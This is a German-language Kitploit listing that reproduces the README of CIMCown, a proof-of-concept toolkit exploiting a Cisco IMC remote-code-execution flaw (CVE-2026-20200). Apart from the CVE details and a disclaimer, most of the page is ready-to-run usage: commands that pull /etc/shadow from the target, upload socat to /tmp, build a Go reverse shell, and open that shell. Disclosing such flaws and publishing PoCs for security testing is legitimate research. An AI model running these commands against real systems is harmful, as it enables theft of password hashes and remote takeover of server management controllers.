Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CIMCown — PoC-Toolkit zum Ausnutzen von Cisco IMC RCE CVE-2026-20200 | Kitploit
Tools/GitHubGitHub/nside-attack-logic/cimcown
SchwachstellenanalyseExploitationWebanwendungs-ExploitationRemote-Access-ToolPayload-Entwicklung
GitHubnside-attack-logic/cimcown

CIMCown

PoC-Toolkit zum Ausnutzen von Cisco IMC RCE CVE-2026-20200

Repository anzeigen
1vor 9 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CIMCown

CVE-2026-20200 Argument Injection in Cisco IMC mit RCE

Christoph Peil @ NSIDE ATTACK LOGIC 2026

CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Advisory: NSIDE-SA-2026-003
Blogpost: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/

Dieses Proof-of-Concept dient nur zu Demonstrationszwecken und darf nicht für illegale Aktivitäten verwendet werden. NSIDE ATTACK LOGIC übernimmt keine Verantwortung für Schäden, die durch die Verwendung oder den Missbrauch dieses Codes entstehen.

Dieser Exploit ermöglicht das Herunterladen von Dateien, das Hochladen von Dateien und das Starten einer Reverse Shell. Er enthält mehrere Python-Dateien des PoC, einen Ordner shell und einen Ordner download.

Im Ordner download werden alle Dateien abgelegt, die vom Server heruntergeladen wurden, unter ihrem Namen (z. B. /etc/passwd > passwd).

Der Ordner shell enthält alles, was für eine Reverse Shell benötigt wird. Die Datei lib.so ist eine kleine Bibliothek, die für ARM gebaut wurde, um die Binärdatei auf dem IMC in /tmp/main einfach auszuführen. Der genaue Befehl zum Bauen befindet sich in util.py. Außerdem liegt im Ordner eine reverse_shell.go.example, eine kleine Go-Reverse-Shell, die zuvor kompiliert werden muss, damit sie deine lokale IP enthält, die für die Reverse Shell verwendet wird.

Damit die Reverse Shell funktioniert, muss man sie zuerst mit der Aktion -a build bauen.

Installation:

root@kitploit:~
sudo apt install golang-go
pip install -r requirements.txt

Verwendung

root@kitploit:~
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
  -h, --help            show this help message and exit
  --proxy PROXY         Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
  -t, --host HOST       Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -U, --username USERNAME
  -P, --password PASSWORD
  -a, --action ACTION   Action: test, download, upload, build, shell (default: test)
						Test will connect to the CIMC and download the file /etc/passwd
  -u, --uploadFile UPLOADFILE
                        File to upload
  -p, --remoteFile REMOTEFILE
                        Remote file path to upload to
  -d, --downloadFile DOWNLOADFILE
                        File to download, is saved into 'Download'
  -v, --verbose         Displays more information about cimc

Beispiele

Beachte das große U und das große P für Benutzer und Passwort!

Teste das Tool und den Login

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2

Lade die Datei /etc/shadow herunter

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2

Lade die Datei ./shell/socat nach /tmp/socat hoch

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2

Erstelle die Go-Reverse-Shell

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a build

Erhalte eine Reverse Shell

Die Aktion 'build' wird vorher benötigt, um die lokale IP in revShell zu setzen
root@kitploit:~
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell
Tool herunterladen